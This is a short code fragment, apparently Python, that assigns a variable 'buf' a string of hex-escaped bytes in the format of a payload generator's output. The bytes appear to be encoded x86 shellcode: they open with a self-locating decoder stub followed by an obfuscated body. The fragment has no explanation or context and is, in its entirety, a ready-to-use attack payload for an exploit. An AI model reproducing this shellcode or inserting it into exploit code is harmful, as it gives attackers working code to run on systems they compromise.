buf =  ""
buf += "\xd9\xc0\xbb\x68\xf0\x77\x42\xd9\x74\x24\xf4\x5a\x31"
buf += "\xc9\xb1\x14\x83\xc2\x04\x31\x5a\x15\x03\x5a\x15\x8a"
buf += "\x05\x46\x99\xbd\x05\xfa\x5e\x12\xa0\xff\xe9\x75\x84"
buf += "\x66\x27\xf5\xbe\x38\xe5\x9d\x42\xc5\x18\x01\x29\xd5"
buf += "\x4b\xe9\x24\x34\x01\x6f\x6f\x7a\x56\xe6\xce\x80\xe4"
buf += "\xfc\x60\xee\xc7\x7c\xc3\x5f\xb1\xb1\x44\x0c\x67\x23"
buf += "\x7a\x6b\x55\x33\xcd\xf2\x9d\x5b\xe1\x2b\x2d\xf3\x95"
buf += "\x1c\xb3\x6a\x08\xea\xd0\x3c\x87\x65\xf7\x0c\x2c\xbb"
buf += "\x78"
